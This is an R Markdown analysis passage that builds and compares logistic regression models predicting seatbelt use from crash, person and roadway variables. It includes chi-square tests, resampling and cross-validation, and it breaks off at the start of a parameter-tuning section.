\n```{r}\ndf <- person_crashes_roadway_innerjoin\n\nrequire(plyr)\n#can also do this with index numbers, but this is more readable\nkeep <- df[,c(\"CRN\", \"CRASH_YEAR\", \"SEX\", \"AGE\", \"TRANSPORTED\", \"Involvement\", \"AgeGroup\",\n \"seatbelt\", \"HOUR_OF_DAY\" , \"DAY_OF_WEEK\" , \"CRASH_MONTH\" , \"WEATHER\" , \"ROAD_CONDITION\", \"LATITUDE\", \"LONGITUDE\" , \"LANE_COUNT\" , \"SPEED_LIMIT\")]\n\nkeep$seatbelt_yn <- revalue(keep$seatbelt, c(\"No\"=0, \"Yes\"=1))\n\ncrashes_persons_roadway <- keep[,c(\"SEX\", \"AGE\", \"Involvement\", \"AgeGroup\",\n \"seatbelt_yn\", \"HOUR_OF_DAY\" , \"CRASH_MONTH\" , \"WEATHER\" , \"LANE_COUNT\" , \"SPEED_LIMIT\")]\n\n#fix seatbelt_yn factor ordering\ncrashes_persons_roadway$seatbelt_yn <- factor(crashes_persons_roadway$seatbelt_yn, labels = c(0, 1))\nstr(crashes_persons_roadway)\n```\n\nAfter these cleaning steps we have a dataframe with 43,463 observations and 10 variables. In order to build several different models and compare the performance of these models we now need to create some new variables that are grouping of our variables. \n\nFor example, HOUR_OF_DAY will be turned into a Night_DAY factor variable, but also left as 24 hours. This will let us test two models. The first will let us see whether Night versus Day is significant for predicting seatbelt use. The 24 level hour of day will allow us to identify the specific Hours of Day that contribute to this effect. We'll create two different time ranges for night vs. day.\n\nAfter we create these two new groups, we'll run a Chisq test to make sure that these groupings show significant differences in seatbelt use. 
\n```{r}\n#Mapping values for night as 9PM & 12AM and running ChiSq on two groups\ncrashes_persons_roadway$night <- mapvalues(crashes_persons_roadway$HOUR_OF_DAY, \n from = c(\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\",\n \"7\", \"8\", \"9\", \"10\", \"11\", \"12\",\n \"13\", \"14\", \"15\", \"16\", \"17\", \"18\",\n \"19\", \"20\", \"21\", \"22\", \"23\"),\n to = c(\"Late Night\", \"Late Night\", \n \"Not Late Night\", \"Not Late Night\", \n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Not Late Night\",\n \"Not Late Night\", \"Late Night\",\n \"Late Night\", \"Late Night\"))\nnight_chi = table(crashes_persons_roadway$night, crashes_persons_roadway$seatbelt_yn)\nnight_chi\nchisq.test(night_chi)\n\n#Mapping second set of values for variable that is a 'longer_night' as 9PM - 4AM;\ncrashes_persons_roadway$longer_night <- mapvalues(crashes_persons_roadway$HOUR_OF_DAY, \n from = c(\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\",\n \"7\", \"8\", \"9\", \"10\", \"11\", \"12\",\n \"13\", \"14\", \"15\", \"16\", \"17\", \"18\",\n \"19\", \"20\", \"21\", \"22\", \"23\"),\n to = c(\"Night\", \"Night\", \n \"Night\", \"Night\", \n \"Night\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Day\",\n \"Day\", \"Night\",\n \"Night\", \"Night\"\n ))\nlonger_night_chi <- table(crashes_persons_roadway$longer_night, \n crashes_persons_roadway$seatbelt_yn)\nlonger_night_chi\nchisq.test(longer_night_chi)\n```\nRunning a Chisq test on these two groups tells us that they have a significant differences in terms of expected versus observed frequencies for Seatbelt use. 
The longer_night variable shows greater significance, so we will primarily use this variable for model building. \n\nNext, we'll create a two level factor variable for Weather and run a ChiSq\n```{r}\ncrashes_persons_roadway$precip <- mapvalues(crashes_persons_roadway$WEATHER, \n from = c(\"Clear\", \"Rain\", \n \"Fog\", \"Snow\"),\n to = c( \"No Precip\", \"Precip\",\n \"No Precip\", \"Precip\"))\nweather_chi = table(crashes_persons_roadway$precip, crashes_persons_roadway$seatbelt_yn)\nweather_chi\nchisq.test(weather_chi)\n```\nRunning a Chisq test on these two weather groups tells us that they have a significant differences in terms of expected versus observed frequencies for Seatbelt use. \n\nNext, create two levels for Speed Limit: Low Speed or High Speed and Run Chi Square\n```{r}\n#Roads > 35 MPH = High Speed\ncrashes_persons_roadway$Speed_Category <- cut(crashes_persons_roadway$SPEED_LIMIT, c(0,35,65), labels = c(\"Low Speed\", \"High Speed\"))\n\nspeed_category_chi <- table(crashes_persons_roadway$Speed_Category, \n crashes_persons_roadway$seatbelt_yn)\nchisq.test(speed_category_chi)\n```\n\nAgain, we see that these two groups have significant differences. Finally, we'll create new a new two level variable for Lane Counts: Big Road or Small Road and run a ChiSquare test. \n```{r}\n#Roads with Lane Cournt >2 = Big Road\ncrashes_persons_roadway$Road_Size <- cut(crashes_persons_roadway$LANE_COUNT, c(0,2,6), labels = c(\"Small Road\", \"Big Road\"))\ncrashes_persons_roadway$LANE_COUNT <- factor(person_crashes_roadway_innerjoin$LANE_COUNT)\n\nroad_size_chi <- table(crashes_persons_roadway$Road_Size, \n crashes_persons_roadway$seatbelt_yn)\nchisq.test(road_size_chi)\n```\n\nThe Chi-square again returns a significant result. Across all of our new variables, we can reject the null hypothesis that the distribution of seatbelt use is independent of these factors. \n\n### 7. 
Logistic Regression Model Building Using GLM and GLMMULTI.\n\nTo this point we have completed an EDA of the newly added variables and reduced the dimensionality of our primary dataframe - 'crashes_persons_roadway\" - by re-coding four variables in our data to be two level factor variables. Overall, this should help make our model more interpretable and reduce the noise in it. We are now going to set some final variables to factors, and copy this into a three separate dataframes that we will pass to our various modeling functions and compare the performance. \n\n```{r}\n#Copy Dataframe and Set Variables to Factors\ncrashes_persons_roadway_copy <- crashes_persons_roadway\n\ncrashes_persons_roadway_copy$Involvement <- as.factor(crashes_persons_roadway_copy$Involvement)\n\ncrashes_persons_roadway_copy$SPEED_LIMIT <- as.factor(crashes_persons_roadway_copy$SPEED_LIMIT)\n\n\n#Create four new dataframes from variables in the 'crashes_persons_roadway_copy' datafrane\ndf_Grouped_night <- crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n \"night\", \"precip\" , \"Road_Size\", \"Speed_Category\", \"seatbelt_yn\")]\n\ndf_Grouped_longNight <- crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n \"longer_night\", \"precip\" , \"Road_Size\", \"Speed_Category\", \"seatbelt_yn\")]\n\ndf_Ungrouped_AgeGroup <-crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n \"HOUR_OF_DAY\" , \"WEATHER\" , \"LANE_COUNT\", \"SPEED_LIMIT\", \"seatbelt_yn\")]\n\n```\n\n### Model 1: GLM Logit Regression \n\nFor our first model, we'll use forward selection with the crashes_persons_roadway_copy dataframe. We'll select from the newly created categorical variables that we identified as affecting seatbelt use through Chi-square testing. 
\n\n```{r, echo = TRUE}\n#Create training and test data sets\ninstall.packages(\"InformationValue\") #Used for calculating sensitvity, specifcity, and ROC Curves with AUROC\nlibrary(InformationValue)\n\n\n#60% of dataset for training sets\nsmp_size <- floor(0.6 * nrow(crashes_persons_roadway_copy))\n\n#set seed to make partition reproductible\nset.seed(122)\ntrain_ind <- sample(seq_len(nrow(crashes_persons_roadway_copy)), size = smp_size)\n\ntrain_new <- crashes_persons_roadway_copy[train_ind, ]\ntest_new <- crashes_persons_roadway_copy[-train_ind, ]\n\n#Train the logit_reduced model\nlogit_reduced <- glm(seatbelt_yn~SEX+AgeGroup+Involvement+longer_night+Road_Size+\n Speed_Category+precip, family = binomial(link=\"logit\"), data = train_new)\nsummary(logit_reduced)\nexp(cbind(OR = coef(logit_reduced), confint(logit_reduced))) #Print Odds Ratio and ConfInt \n```\n\nThe summary of the logit_reduced model shows us that all of our variables and level are significant except for Age Group: Early Middle Age. After we transform the coefficient variables we can more easily interpret how each coefficient affects the likelihood for wearing a seatbelt. Being a passenger or a Male makes someone in this dataset less likely to wear a seatbelt. Increasing age, daytime hours, large roads, or high speed limits make someone more likely to be wearing a seatbelt. Being on a \"high\" speed limit road - defined as above 35 mph - makes the odds of someone wearing a seatbelt 4.4 times higher! 
Wow.\n\nLet's get our accuracy, ROC curve, and then review the confusion matrix.\n```{r}\nnew_predictions <- predict(object = logit_reduced, newdata = test_new,\n type=\"response\")\nnew_binary_predictions <- ifelse(new_predictions > 0.5,1,0) #use same .7 thresh \nnew_misses <- mean(new_binary_predictions != test_new$seatbelt_yn)\nnew_hits <- 1 - new_misses\nprint(\"Reduced Model Hit Rate:\")\nnew_hits \nrequire(ROCR)\nrequire(InformationValue)\nROCRpred <- prediction(new_predictions, test_new$seatbelt_yn)\nROCRperf <- performance(ROCRpred, 'tpr','fpr')\nplot(ROCRperf, colorize = TRUE, text.adj = c(-0.2,1.7))\n\n#ROC PLOT WITH AREA UNDER CURVE\nplotROC(test_new$seatbelt_yn, new_predictions)\n\n#CONFUSION MATRIX\ntable(test_new$seatbelt_yn)\nconfusionMatrix(test_new$seatbelt_yn, new_predictions)\n\ncat(\"Sensitivity: \", sensitivity(test_new$seatbelt_yn, new_predictions, threshold = 0.5), \"\\n\") #Sensitivity (or True Positive Rate) is the percentage of 1s (actuals) correctly predicted by the model, \n\ncat(\"Specificity: \", specificity(test_new$seatbelt_yn, new_predictions, threshold = 0.5)) #specificity is the percentage of 0s (actuals) correctly predicted. \n\n```\nFrom looking at the Hit Rate and area under the curve, this model is performing decently well. However, we know a hit rate of 80% is approximately equal to the distribution of seatbelt use versus non-seatbelt use observations. Let's look at our sensitivity and specificity scores to get a better idea of where and how i.e., the types of errors our classification model is making.\n\nSensitivity = 0.9964298 \nSpecificity = 0.01123928\n\nLooking at sensitivity, we can see that our model is doing a good job of predicting those who will wear their seatbelts. However, it is doing a terrible job of predicting who will not shown as by 'Specificity' of 0.01. The sensitivity tell us the number true positives that are model is accurately predicting. 
The specificity tells us the number of true negatives/non-events that our model is accurately predicting. In this case a non-event is not wearing a seatbelt. These ratios are shown below: \n \n Sensitivity=# Actual 1s and Predicted as 1s\n -------------------------------- \n # of Actual 1s\n \n Specificity= # Actual 0s and Predicted as 0s \n ----------------------------\n # of Actual 0s\n\nLet's explore some other models to see if we can improve specificity. \n\n### Model 2: Main Terms Effect Logistic Regression Using GLMULTI\nWe'll next use the glmulti package to train a model using ourr df_Grourped_longnight dataframve. Glmulti provides automated model selection and model-averaging as a wrapper function for glm that automatically generates all possible models under constraints set by the user such as Information Criterion (AIC, AICc or BIC) for performance evaluation. \n```{r}\n#Here is the information for the Glmulti package: https://cran.r-project.org/web/packages/glmulti/glmulti.pdf Under the Section \"glmulti Automated model selection and multimodel inference with (G)LMs\"\n\ninstall.packages(\"glmulti\")\nlibrary(glmulti)\n\n#60% of dataset for training sets\nsmp_size_mainT <- floor(0.6 * nrow(df_Grouped_longNight))\n\n#set seed to make partition reproductible\nset.seed(6)\ntrain_ind_mainT <- sample(seq_len(nrow(df_Grouped_longNight)), size = smp_size_mainT)\n\ntrain_mainT <- df_Grouped_longNight[train_ind_mainT, ]\ntest_mainT <- df_Grouped_longNight[-train_ind_mainT, ]\n\n\nglmmulti.logistic.out <- glmulti(seatbelt_yn~., data = train_mainT, \n level = 1, # No interaction considered\n method = \"h\", #Exhaustive Approach\n crit = \"aic\", #AIC Criteria\n confsetsize = 5, # Keep 5 Best Model\n plotty = F, report = F, \n fitfunction = 'glm', #GLM function\n family = binomial)\n\nsummary(glmmulti.logistic.out@objects[[1]])\n```\n\nAs before, all of our variables comve back significant except for Age Group Early Middle Age. 
We'll save Model 2 as a model object, print the Odds Ratios and Coefficient Confidence intervals followed by looking at the Hit Rate, ROC, and Sensitivity/ Specificity. \n```{r}\n#Save the best model as an object, and set up a transformed Odds Ratio and Coeff table \nbestMulti.glm.fit <- glmmulti.logistic.out@objects[[1]]\n\n#Odds ratio and confict intervals for transformed coefficients\ncat(\"Odds Ratios and Coefficient Confidence Intervals: \", \"\\n\") \nexp(cbind(OR = coef(bestMulti.glm.fit), confint(bestMulti.glm.fit))) #See Odss Ratio and Confidence Intervals for Coefficients\n\n#Predictions\npred_mainT <- predict(object = bestMulti.glm.fit, newdata = test_mainT,\n type=\"response\")\nnew_binary_predictionsMainT <- ifelse(pred_mainT > 0.5,1,0) #use same .7 thresh \nnew_missesMainT <- mean(new_binary_predictionsMainT != test_mainT$seatbelt_yn)\nnew_hits_mainT <- 1 - new_missesMainT\ncat(\"Reduced Model Hit Rate: \", new_hits_mainT, \"\\n\")\n\n#Print ROC Curves\nrequire(ROCR)\nROCRpred_mainT <- prediction(pred_mainT, test_mainT$seatbelt_yn)\nROCRperf_mainT <- performance(ROCRpred_mainT, 'tpr','fpr')\nplot(ROCRperf_mainT, colorize = TRUE, text.adj = c(-0.2,1.7))\nplotROC(test_mainT$seatbelt_yn, pred_mainT)\n\n#Print Specificity and Sensitivity\ncat(\"Sensitivity: \", sensitivity(test_mainT$seatbelt_yn, pred_mainT, threshold = 0.5), \"\\n\")\ncat(\"Specificity: \", specificity(test_mainT$seatbelt_yn, pred_mainT, threshold = 0.5))\n\n```\nThis model returns very similar results and shows no appreciable improvement. The area under the ROC curve is 0.71647, slightly worse than the previous model. The AIC value is also similar. More importantly, this model is just as poor at predicting drivers who do not wear seatbelts, but is good at predicting True Positives for seatbelt usage. \n\nLet's run an ANOVA to see if this can help gives us some insight into the comparative performance of these models. 
\n```{r}\nanova(logit_reduced, bestMulti.glm.fit, test = \"Chisq\")\n```\n\nRunning ANOVA, we see that Model 1 performs slightly better in terms of variance explained. However, neither model can break a hit rate of more than 80%, which is roughly equivalent to the distribution of Seatbelt Use 'Yes' versus 'No'. Furthermore, we've had no success accurately predicting Drivers or Passengers who do not wear seatbelts despite creating variables that were confirmed by ChiSq tests to be extremely significant. \n\n### Model 4: GLM with Unbiased Resampled Data Using Information Value Package and df_Grouped_longNight Dataframe\nThe next thing we can do to try fit a model to is address the bias in our data. We can resample our training data to draw \"Yes\" and \"No\" in equal proportions. We'll go ahead and do this, but first we'll convert some of our categorical variables to continuous variables represented as Weight of Evidence (WOE) equivalents. WOEs are commonly used for assessing credit risk and provides a method of re-coding categorical variables to continuous variables. The formula for WOE is as follows:\n\n WOE = ln(percent good of all goods/ percent bad of all bads)\n \nIn this formula, goods is synonymous with ones or Yes events and bads is synonymous with zeros, non-events, negatives or non-responders. Overall, the WOE is calculated using a basic odds ratio. \n\nLet's start by re-coding the categorical variables in our df_Grouped_longNight dataframe to continuous WOE variables. 
To do this we'll use the InformationValue package.\n```{r}\n#Copy our data frame\ndf_Grouped_longNight_copy <- df_Grouped_longNight\n\n#Select categorical variables for recoding to continuous\nfactor_vars <- c (\"SEX\", \"Involvement\", \"longer_night\", \"precip\", \"Road_Size\", \"Speed_Category\", \"AgeGroup\")\n\n#install.packages(\"InformationValue\")\nlibrary(InformationValue)\n\n#Conditional for loop to translate factor vaiables\nfor(factor_var in factor_vars){\n df_Grouped_longNight_copy[[factor_var]] <- WOE(X=df_Grouped_longNight_copy[, factor_var], Y=df_Grouped_longNight_copy$seatbelt_yn)\n}\n\nhead(df_Grouped_longNight_copy)\n```\n\nAlright, we have our categorical variables translated to continuous variables using the InformationValue package's WOE function. \n\nNext, let's resample our training dataset and test dataset. In this case, the training data will have an equal sample of 0s and 1s, but the test data set will have a distribution of 0s and 1s similar to the raw data. Additionally our training data will be smaller than our test data, but the training data will still have over 10k observations. 
\n```{r}\n#Store two new dataframes one that contains all the Yes observations and One all of the No oobservations\nseatbelt_y <- df_Grouped_longNight_copy[which(df_Grouped_longNight_copy$seatbelt_yn == 1), ] # all 1's\nseatbelt_n <- df_Grouped_longNight_copy[which(df_Grouped_longNight_copy$seatbelt_yn == 0), ] # all 0's\n\nset.seed(40) # for repeatability of samples\n\nseatbelt_y_training_rows <- sample(1:nrow(seatbelt_y), 0.7*nrow(seatbelt_n)) # ***Pick as many 0's as 1's\nseatbelt_n_training_rows <- sample(1:nrow(seatbelt_n), 0.7*nrow(seatbelt_n)) \n# 1's for training\ntraining_y <- seatbelt_y[seatbelt_y_training_rows, ] \ntraining_n <- seatbelt_n[seatbelt_n_training_rows, ]\ntrainingData <- rbind(training_y, training_n) # row bind the 1's and 0's \n\n# Create Test Data\ntestData_size <- sample(1:nrow(df_Grouped_longNight_copy), size = 25000 ) #Select 25,000 observations for testing\ntestData <- df_Grouped_longNight_copy[testData_size, ]\n\n#Confirm the distributions of seatbelt Use in trainingData and testData\ntable(trainingData$seatbelt_yn)\ntable(testData$seatbelt_yn)\n```\nAlright, we see that the distribution of 0s and 1s in our trainingData is as we want it after resampling. \n\nLet's now train Model 3 using GLM with our new unbiased training data. Afterwards, we'll look at model summary, variable inflation factors for collinearity, and Odds Ratios. \n```{r}\n#Train model\nlogitMod <- glm(seatbelt_yn ~., data=trainingData, family=binomial(link=\"logit\"), weights = )\nsummary(logitMod) #Summarize the model\n\n#Print Odds Ratio\nexp(cbind(OR = coef(logitMod), confint(logitMod)))\n\nrequire(car)\nvif(logitMod) #check collinearity, all variables have a VIF well below 4\n```\n\nLooking at the Odds Ratio, this models seems to place more weight on Sex, Night Versus Day and Weather. Interestingly, the model does not return a significant p-value for Road_Size and the Odds Ratio is close to 1 with a value of 1.06. 
We see that none of the variables have VIF approaching four, so we can feel confident that there is little collinearity. \n\nLet's look at the hit rate. To do this, we'll use a function in the Information Value package called misClassError. The Hit Rate is simply 1 - misClassError. \n\nWe'll then plot the ROC curve, which includes an Area Under the Curve (AUC) for the ROC. Finally, we'll again assess the Sensitivity and Specificity to see if the model is performing better with regards to predicting non-seatbelt users.\n\n```{r}\n#Create a prediction object\npredicted <- plogis(predict(logitMod, testData)) # to convert it into prediction probability scores that is bound between 0 and 1, we use the plogis().\n\n#Misclassification Error/Hit Rate\ncat(\"Hit Rate= \", 1- misClassError(testData$seatbelt_yn, predicted, threshold = 0.5), \"\\n\")\n\n#Print ROC\nplotROC(testData$seatbelt_yn, predicted)\n\n#Print Sensitivity and Specificity and Confusion Matrix\ncat(\"Sensitivity: \", sensitivity(testData$seatbelt_yn, predicted, threshold = 0.5), \"\\n\")\ncat(\"Specifity: \" , specificity(testData$seatbelt_yn, predicted, threshold = 0.5))\nconfusionMatrix(testData$seatbelt_yn, predicted)\n#GUYS NOTE HERE THAT IF YOU MAKE THE THRESHOLD HIGHER, OUR SPECIFICITY GETS BETTER AT THE COST OF SENSITIVITY. I also experimented to see what would happen if your changed the distrbrution of 0s and 1s slightly to say 60-40 or if your changed the size of the ttest data. It does seem that an even split of 0s and 1s and a test data size of 25,000 is optial. \n```\n\nThe results here are more encouraging. Although our hit rate is worse at 62.7%, we are doing many times better with the Specificity of our model which is 0.764 i.e., predicting who did not wear seatbelts. However, this improvement in specificity is coming at the cost of Sensitivity (True Positives) i.e. those who are wearing seatbelts. \n\nOverall, these results are confirming that sample bias was confounding our model. 
Now that we know this was an issue, let's test a few more models using this approach. \n\n### Model 4: GLM with Unbiased Resampled Data Using Information Value Package and df_Ungrouped_Age Dataframe\nThe next model we'll test is using the df_Ungrouped_Age dataframe. We'll see if leaving our categorical variables ungrouped improves the model. As before, we'll start by re-coding the categorical variables to WOE continuous variables and then resampling our training and test data.\n```{r}\nset.seed(105) # for repeatability of sample\n\n#df_Ungrouped_AgeGroup <-crashes_persons_roadway_copy[,c(\"SEX\", \"AgeGroup\", \"Involvement\",\n # \"HOUR_OF_DAY\" , \"WEATHER\" , \"LANE_COUNT\", \"SPEED_LIMIT\", \"seatbelt_yn\")]\n\n#Copy our data frame\ndf_Ungrouped_AgeGroup_copy <- df_Ungrouped_AgeGroup\n\n#Select categorical variables for recoding to continuous\nfactor_vars_dfAge <- c (\"SEX\", \"Involvement\", \"AgeGroup\", \"HOUR_OF_DAY\", \"LANE_COUNT\", \"SPEED_LIMIT\", \"WEATHER\")\n\n#Conditional for loop to translate factor vaiables\nfor(factor_var in factor_vars_dfAge){\n df_Ungrouped_AgeGroup_copy[[factor_var]] <- WOE(X=df_Ungrouped_AgeGroup_copy[, factor_var], Y=df_Ungrouped_AgeGroup_copy$seatbelt_yn)\n}\n\nhead(df_Ungrouped_AgeGroup_copy)\n\n# Create Training Data\nseatbelt_y_df_age <- df_Ungrouped_AgeGroup_copy[which(df_Ungrouped_AgeGroup_copy$seatbelt_yn == 1), ] # all 1's\nseatbelt_n_df_age <- df_Ungrouped_AgeGroup_copy[which(df_Ungrouped_AgeGroup_copy$seatbelt_yn == 0), ] # all 0's\n\nseatbelt_y_dfAge_training_rows <- sample(1:nrow(seatbelt_y_df_age), 0.7*nrow(seatbelt_n_df_age)) # ***Pick as many 1's as 0's\nseatbelt_n_dfAge_training_rows <- sample(1:nrow(seatbelt_n_df_age), 0.7*nrow(seatbelt_n_df_age)) \n\ntraining_y_df_age <- seatbelt_y_df_age[seatbelt_y_dfAge_training_rows, ] \ntraining_n_df_age <- seatbelt_n_df_age[seatbelt_n_dfAge_training_rows, ]\n\ntrainingData_dfAge <- rbind(training_y_df_age, training_n_df_age) # row bind the 1's and 0's \n\n# Create Test 
Data\ntestData_size_dfAge <- sample(1:nrow(df_Ungrouped_AgeGroup), size = 25000 )\n\ntestData_dfAge <- df_Ungrouped_AgeGroup_copy[testData_size_dfAge, ]\n\ntable(trainingData_dfAge$seatbelt_yn)\n\ntable(testData_dfAge$seatbelt_yn)\n\n```\n\nWith the variables recoded and our training data resampled to account for bias, we can now test Model 4. As before, we'll print a summary of the model, Odds Ratios and Confidence Intervals, and then the VIFs. \n```{r}\nlogitMod_dfAge <- glm(seatbelt_yn ~., data=trainingData_dfAge, family=binomial(link=\"logit\"))\nsummary(logitMod_dfAge)\n\n#Print Odds Ratio\nexp(cbind(OR = coef(logitMod_dfAge) , confint(logitMod_dfAge)))\n\n#Print VIF\nvif(logitMod_dfAge)\n\n```\nThe Odds Ratio shows that Model 4 is using Sex, Hour of the Day, and Weather very strongly. Speed Limit also affects Seatbelt Use. From only the Odds Ratios is does not appear that grouping or ungrouping the variables has considerable effect. \n\nNext, we'll create prediction, plot ROC, and show Hit Rate using misclassification error, Specificity, and Sensitivity. \n```{r}\npredicted_dfAge <- plogis(predict(logitMod_dfAge, testData_dfAge)) # to convert it into prediction probability scores that is bound between 0 and 1, we use the plogis().\n\n#Hit Rate\ncat(\"Hit Rate: \", 1 - misClassError(testData_dfAge$seatbelt_yn, predicted_dfAge, threshold = 0.5), \"\\n\")\n\n#Plot ROC\nplotROC(testData_dfAge$seatbelt_yn, predicted_dfAge)\n\n#Print Sensitivity and Specificity and Confusion Matrix\ncat(\"Sensitivity: \", sensitivity(testData_dfAge$seatbelt_yn, predicted_dfAge, threshold = 0.5), \"\\n\")\ncat(\"Specifity: \" , specificity(testData_dfAge$seatbelt_yn, predicted_dfAge, threshold = 0.5))\nconfusionMatrix(testData_dfAge$seatbelt_yn, predicted_dfAge)\n\n#Note again increasing threshold will improve specificity at the cost of overall Hit Rate and sensitivity\n```\nModel 4 returns similar results to Model 3. 
\n\nHit Rate: 0.6369 \nSensitivity: 0.607104 \nSpecificity: 0.762641\n\nWe can feel safe assuming that the model's performance is unaffected by how we have grouped our our variables. Overall, Model 4 performed slightly better, but the difference seems negligible, especially considering we are using different random samples to build our training data. \n\n### Model 6: Pass Unbiased Training Data to Glmulti with df_Grouped_longnight\nLet's try one more model. For this, we'll use the df_Grouped_long night dataframe and resample the training data so we have an unbiased training sample. Then, we'll pass this training data to GLMULTI to take advantage of its exhaustive search functionality and model averaging abilities. \n```{r}\n#Check that we are rusing the right training and test data\nhead(trainingData)\ntable(trainingData$seatbelt_yn)\n\nhead(testData)\n```\n\nWe'll now pass this data to glmulti. As before we'll then save then best model as a model object before printing a summary of the model, Odds Ratios, and VIFs to check for collinearity. \n\n```{r}\nset.seed(55)\nglmmulti.unbiased <- glmulti(seatbelt_yn~., data = trainingData, \n level = 1, # No interaction considered\n method = \"h\", #Exhaustive Approach\n crit = \"aic\", #AIC Criteria\n confsetsize = 5, # Keep 5 Best Model\n plotty = F, report = F, \n fitfunction = 'glm', #GLM function\n family = binomial)\n\n#Save the best model as an object\nglmmulti.unbiased <- glmmulti.unbiased@objects[[1]]\n\n#Print model summary\nsummary(glmmulti.unbiased)\n\n#Odds ratio and confict intervals for transformed coefficients\nexp(cbind(OR = coef(glmmulti.unbiased), confint(glmmulti.unbiased))) #See Odss Ratio and Confidence Intervals for Coefficients\n\nvif(glmmulti.unbiased)\n\n```\n\nThe glmulti package selected a model that includes Sex, AgeGroup, longer_night, precip, and Speed_Category. Interestingly, it did not include the Road_Size variable. Its possible that it excluded it and chose to include the Speed Category. 
Overall, the Odds Ratios show Sex, Night vs Day, and Weather as the having the largest effect on whether someone will wear a seatbelt. \n\nAs the final step, we'll print out the ROC, Specificity, Sensitivity, and Confusion Matrix. \n```{r}\npredicted_glmUnbiased <- plogis(predict(glmmulti.unbiased, testData)) # to convert it into prediction probability scores that is bound between 0 and 1, we use the plogis().\n\n#Hit Rate\ncat(\"Hit Rate: \", 1 - misClassError(testData$seatbelt_yn, predicted_glmUnbiased, threshold = 0.5), \"\\n\")\n\n#Plot ROC\nplotROC(testData$seatbelt_yn, predicted_glmUnbiased)\n\n#Print Sensitivity and Specificity and Confusion Matrix\ncat(\"Sensitivity: \", sensitivity(testData$seatbelt_yn, predicted_glmUnbiased, threshold = 0.5), \"\\n\")\ncat(\"Specifity: \" , specificity(testData$seatbelt_yn, predicted_glmUnbiased, threshold = 0.5))\nconfusionMatrix(testData$seatbelt_yn, predicted_glmUnbiased)\n\n#Note again increasing threshold will improve specificity at the cost of overall Hit Rate and sensitivity\n\n```\nThe performance of Model 5 is similar to models 3 & 4. The performances are shown below. \n\nModel 3 Model 4 Model 5\nHit Rate= 0.6272 Hit Rate: 0.6369 Hit Rate: 0.6239 \nSensitivity: 0.5941921 Sensitivity: 0.607104 Sensitivity: 0.5894763 \nSpecificity: 0.7639547 Specificity: 0.762641 Specificity: 0.7666323 \nAIC: 14461 AIC: 14209 AIC: 14460\n \nSo far, we have tested 5 models. It appears that Model 4 - logitMod_dfAge - performs the best. Although it's hit rate is only ~64%, it predicts who will not wear a seatbelt (specificity) with greater than 75% accuracy . Given that this is the purpose of this analysis, we'll move forward with this model. \n\n### 8. Cross Validation of Model 4 logitMod_dfAge\n\nAs a next step, we'll do a cross validation to see this models performance across a number of iterations. 
For this cross validation, we'll actually do a variant of k-fold cross validation where we randomly break the dataset up into chunks of 85% and 15% and test the model over 250 iterations. In k-fold cross validation, the dataset is partitioned into k equally sized segments or folds to train the model. Within each iteration of the cross validation, one fold is held out as the test data while the k-1 other folds are used to train the model. \n\nFor our cross validation, we'll still take advantage of our unbiased training dataframe - trainingData_dfAge. \n\n```{r}\nlibrary(plyr) # progress bar\nlibrary(caret) # confusion matrix\n\n# False positive rate\nfpr <- NULL\n\n# False negative rate\nfnr <- NULL\n\n# Number of iterations\nk <- 250\n\n# Initialize progress bar\npbar <- create_progress_bar('text')\npbar$init(k)\n\nacc <- NULL\n\nset.seed(222)\n\nfor(i in 1:k)\n{ # Train-test splitting\n # 85% of samples -> fitting\n # 15% of samples -> testing\n smp_size <- floor(0.85 * nrow(trainingData_dfAge)) #Sample from unbiased training data frame\n index <- sample(seq_len(nrow(trainingData_dfAge)),size=smp_size)\n train_cv <- trainingData_dfAge[index, ]\n\n#fitting the model\nmodel5_cv <- glm(seatbelt_yn~., family = binomial, data = train_cv)\n\n#predicting results \n\nresults_prob_cv <- predict(model5_cv, testData_dfAge, type = \"response\") #Predict against normally distributed data\nresults_cv <- ifelse(results_prob_cv >0.5, 1,0)\n\nanswers <- testData_dfAge$seatbelt_yn\n\nmisClassificError <- mean(answers != results_cv)\n\n#Calculate hit rate\nacc[i] <- 1 -misClassificError\n\n cm <- confusionMatrix(data=results_cv, reference=answers)\n fpr[i] <- cm$table[2]/(nrow(trainingData_dfAge)-smp_size)\n fnr[i] <- cm$table[3]/(nrow(trainingData_dfAge)-smp_size)\n \n pbar$step()\n}\n\n\n# Average accuracy of the model\ncat(\"/n\", \"Average Model Accuracy: \", mean(acc), \"\\n\")\n\npar(mfcol=c(1,2))\n\n# Histogram of accuracy\nhist(acc,xlab='Accuracy',ylab='Freq',\n 
col='cyan',border='blue',density=30, main = 'Hit Rate \\n # of Iterations = 250')\n\n# Boxplot of accuracy\nboxplot(acc,col='cyan',border='blue',horizontal=T,xlab='Accuracy',\n main='Cross Validated Hit Rate')\n\n# Confusion matrix and plots of fpr and fnr\ncat(\"Average Model False Positive Rate: \", mean(fpr), \"\\n\")\ncat(\"Average Model False Negative Rate: \", mean(fnr))\nhist(fpr,xlab='% of FPR',ylab='Freq',main='False Positive Rate',\n col='cyan',border='blue',density=30)\nhist(fnr,xlab='% of FNR',ylab='Freq',main='False Negative Rate',\n col='cyan',border='blue',density=30)\n\n```\n\nTesting our model over 250 iterations, we see that it performs well. With a hit rate ranging from 0.632 - 0.642. \n\n### 9.Paramter Tuning of Model 4 logitMod_dfAge\n\nThe final thing we could do to try and improve our model's performance is to look at ways to improve the tuning parameters of the coefficients of our model. All models depend on coefficients as well as on one or more tuning parameters. Coefficients are estimated using training data, while the tuning parameters are chosen. Tuning parameters help to regulate the model complexity and the choice of the tuning parameter values is important because it is linked with the accuracy of the predictions returned by the model.\n\nThe glmnet package fits the variable coefficients of a generalized linear model using a penalized maximum likelihood tuning parameter. For the tuning parameter lambda, the package computes the regularization path for the elastic-net penalty over a grid of values. A second tuning parameter called the mixing percentage is denoted by alpha. 
